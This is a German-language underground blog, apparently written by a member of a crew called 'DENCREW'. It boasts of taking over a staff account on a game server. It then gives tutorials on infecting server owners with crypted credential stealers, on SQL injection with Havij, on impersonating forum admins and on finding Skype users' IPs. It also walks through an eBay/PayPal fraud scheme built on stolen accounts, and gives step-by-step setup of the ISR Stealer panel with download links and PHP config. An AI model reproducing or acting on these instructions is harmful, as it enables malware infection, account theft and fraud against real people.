Die DenCREW die vor geraumer Zeit von DENOVA gegründet wurde, war wieder tätig.
Diesmal waren es 2 Mitglieder aus der DENCREW, die sich heute Zugriff auf den Staff-Account von xRiki verschafft haben.
Eine Tat die ich persönlich nicht in Ordnung fand, weil ich guten Kontakt mit dem Besitzer vom Cabbo.eu habe.
Trotzdem war es wieder eine Tat, die respekt verdient hat und gezeigt hat, dass die DENCREW nicht nur große Sprüche kloppt.
Es werden weitere Retros folgen.
Screens:
Eine neue CREW ist wieder tätig.
Eine Crew, die nicht einfach nur Kinder sind und einfach nur cool wirken wollen.
Die DENCREW beschäftigt sich intensiv mit underground.
Die Mitglieder dieser Crew besitzen Wissen in verschiedenen Bereichen.
Der Umgang mit Stealern sowie Keyloggern ist aber hier Hauptmerkmal.
Intensic beschäftigen sie sich noch mit der gezielten Infizierung um an gewissen Daten zu kommen.
Ihr werdet noch viel von der DENCREW hören.
Viele Leute träumen von dem „hacken“ eines Retros.
Wie verschafft man sich denn aber Zugriff in die Administration bzw. internen Bereichen eines Retros.
Es gibt viele Möglichkeiten sich in ein Retro zu hacken.
1.Möglichkeit
Die gezielte Infizierung mit einem Stealer bzw. Virus.
Du besorgst dir ein Stealer(ganz unten in meinem Blog steht ein Tutorial zu der Konfiguration eines Stealers).
Du cryptest dir dein Stealer FUD(fully undetected), d.h dein Virus wird von Anti-Viren Programmen nicht gefunden.
Das kannst du auf vielen Foren machen, wie zum Beispiel Hackforum.net, zu Teil auch noch auf Virus.to.
Jetzt wenn dein Virus bereit hast, versuchst du den Inhaber eines Retros zu infizieren.
Wenn du den mit einem Stealer infizierst, zieht es all seine Loginbesuche.
Meist ist da auch der Login in seinen Hoster dabei oder auch einfach von seinem Admin-Account seines Retros.
Der Zugriff auf sein Root/Server wäre natürlich besser.
Der Rest erklärt sich von selbst.
Aber jemanden gezielt zu infizieren ist keine Kindersache, meist sind die Inhaber nicht so dumm wie man denkt.
2.Möglichkeit
Was social engineering ist (http://de.wikipedia.org/wiki/Social_Engineering_%28Sicherheit%29)
Wenn du weißt was SE ist, kann es auch losgehen.
Für SE brauchst du schon ein ausgeprägtes Gehirn.
Jemanden mit Wörtern bzw. Sätzen zu manipulieren ist ziemlich schwierig.
Retros zu SEn ist aber nicht gerade das Schwierigste.
Ich selber kenne mich mit SE nicht so gut aus, deswegen kann ich auch nicht viel dazu sagen.
Es gibt viele Tutorials zu SE, macht euch mit diesem Thema vertraut.
Wenn ihr das drauf habt, ist das Leben für euch kostenlos.
Ich empfehle hier euch hierbei noch den SE Workshop von Judgment, diesen stellt er auf Virus.to kostenlos zu Verfügung.
3.Möglichkeit
SQL Injection durchführen indem du eine Lücke ausnutzt.
Für SQL Injection müsst ihr aber zunächst PHP oder mit Webseitensicherheit beschäftigen.
Aber wenn es eine public SQLi gibt, kannst du diese mit Havij ausnutzen.
Havij:
http://www.itsecteam.com/products/havij-v116-advanced-sql-injection/
Es gibt noch viele andere Möglichkeiten, aber mit denen bin ich noch nicht so gut vertraut.
Der Artikel wurde so spontan geschrieben.
Willkommen auf meiner Webseite,
hier möchte ich euch zeigen wie ihr euch in jedem Forum beliebig nennen könnt.
Dazu braucht ihr dieses Programm:
http://www.file-upload.net/download-7042121/Unikot.exe.html
Wenn ihr diese .exe ausführt, habt ihr ein unsichtbares Zeichen in der Zwischenablage.
Jetzt gibt ihr zum Beispiel in ein Forum, dort nennt ihr euch wie ihr wollt.
Hinter den Namen müsst ihr jetzt einfach „Einfügen“ oder STRG+V drücken.
Jetzt befindet sich neben eurem Namen ein unsichtbares Zeichen.
Jetzt könnt ihr euch mit diesem Account-Namen registrieren.
PS:
Du hast keine Permission dann, also d.h keine Admin-Rechte oder so.
Du heißt dann lediglich wie der Administrator ggf. dein Idol!
Tutorial by DENOVA
Viele benutzen das soziale Netzwerk Skype.
Doch viele wissen nicht, dass Skype P2P ist.
Was per to per ist (http://de.wikipedia.org/wiki/Peer-to-Peer)
Durch public Tools kann man ganz leicht die IP des Users rausfinden.
Anbieter:
Einfach den Usernamen eingeben und ihr habt die IP!
Viele beschäftigen sich mit Fraud.
Das Leichteste im Bereich „Fraud“ ist das Faken von Domains.
Doch viele schaffen es nicht, weil sie keinen richtigen Anbieter finden.
Anbieter: 1und1.de
Daten: http://www.fake-it.biz
Wer ein ausführliches Tutorial will, bitte kommentieren.
Heute möchte ich euch erklären, wie ihr Geld macht.
Es handelt sich dabei um Ebay-Faking.
Zunächst braucht ihr einen Stealer, Keylogger oder irgendwas was Daten zieht.
Wenn ihr jetzt beispielweise einen Stealer habt, müsst ihr anfangen Leute zu infizeren.
Aber nicht Leute aus RetroTown oder so, die haben meist kein Ebay-Account.
Wenn ihr nach dem erfolgreichen spreaden, Logs mit Ebay-Accounts habt.
Checkt ihr die ab, es müssen postivie Bewertungen dabei.
Mindestens 5 Stück und keine negative Bewertungen.
Dann ändert ihr die kompletten Daten, Passwort, E-Mail, etc.
Wenn ihr jetzt euren Ebay-Account bereit habt, fängt ihr an.
Ihr braucht einen Paypal-Account, der muss verifiziert sein.
Das könnt ihr http://paypal-vcc.net/ hier machen.
Ihr stellt ein iPhone 5 für 600 Euro zu Verkauf, Zahlungsmöglichkeit nur Paypal.
Ihr sagt, dass die Ware direkt nach dem Geldeingang gesendet wird.
Es werden relativ schnell Kunden geben, die interesse am iPhone haben.
Wenn ihr alles geklärt habt etc., sagt ihr, dass er das Geld auf das jeweilige PP-Account schicken soll.
Wenn das Geld gesendet wurde, muss alles schell gehen.
Ihr müsst das Geld schnell ausgeben, bevor irgendwas mit dem PP Account passiert.
Das wars auch.
TUTORIAL NICHTS FÜR NEWBIES.
DIE BUSTED-RATE BEI NEWEBIES IST RELATIV HOCH
Tutorial:
1.Zunächst benötigen wir ein Webspace, ich empfehle euch einen Webspace, welcher kostenlos ist, ohost.de
2.Wir laden uns den ISR Stealer herunter, http://www.file-upload.net/download-6996264/ISR-Stealer-0.4.zip.html
3.Wir konfigurieren unseren Stealer
1.Nachdem wir uns auf ohost.de einen Webspace erstellt haben, erstellen wir uns jetzt eine MySQL Datenbank.
Wenn wir die MySQL Datenbank erstellt haben.
Erstellen wir jetzt ein FTP Konto:
Wir brauchen jetzt noch Filezilla, das könnt ihr ganz leicht downloaden.
Nachdem wir uns den ISR Stealer gedownloadet haben, gehen wir auf den Ordner "PHP".
Dort gehen wir dann auf "config" und ändern die jeweilige Werte.
<?php
<?php
// DB details
$hostname = 'localhost'; // Your Host Name
$database = 'name'; // DataBase Name
$username = 'username'; // Database Username
$password = 'password'; // Password
// Acess details
$adminuser = ‚admin‘;
$adminpass = ‚password‘;
// Config
$logsperpage = 100; // how many logs to show per page?
?>
Jetzt ersetzen wir die Werte mit denen von unserer MYSQL Datenbank.
D.h:
Ersetz diese Werte mit denen von eurer MySQL Datenbank:
‚localhost’=Serveradresse (Host)(steht bei eurer MySQL Datenbank unten)
’name’=Datenbankname
‚username’=Benutzername
‚password’=Passwort
Dann wenn ihr euch später in euer Panel einloggen wollt, braucht ihr Zugangsdaten,
$adminuser = ‚admin‘;= Könnt ihr so lassen
$adminpass = ‚password‘;=Das Passwort mit dem ihr euch später in euer Panel einloggt.
Den Rest lässt ihr einfach so und speichert das jetzt ab.
Jetzt gehen wir in unserem Webspace auf „FTP Konten“, wir haben ja uns eben ein FTP Konto erstellt.
Mit diesen Daten loggen wir uns jetzt in Filezilla ein.
Da viele nichts wissen, was man bei Server einsetzen soll, Server= ftp-web.ohost.de
Jetzt wenn wir uns in Filezilla eingeloggt haben, verschieben wir die Inhalte vom Ordner „PHP“ in das leere Verzeichnis.
Wichtig, nicht den Ordner reinschieben, nur den Inhalt.
So, wenn wir den Inhalt vom Ordner PHP verschoben haben, rufen wir unsere Domain, meine in diesem Fall http://denovx.ohost.de/install.php auf.
Dort drücken wir dann auf „install“.
Jetzt startet ihr in euerem „ISR Stealer 0.4“ Ordner, ISR 0.4.
Dann gibt ihr bei „Your php url“ http://euredomain.ohost.de/index.php ein.
Willkommen!
Wir bedanken uns für die Interesse an unserem Blog.
Hier werdet ihr reichlich Informationen sammeln.
Wir sind ein Blog, welches sich mit verschiedenen Sachen beschäftigt.
Tutorials zu diversen Betätigungen.
Wir werden uns natürlich auch mit underground beschäftigen!
Seid gespannt!
Mit freundlichen Grüßen,
Yauzublog
Yauzu 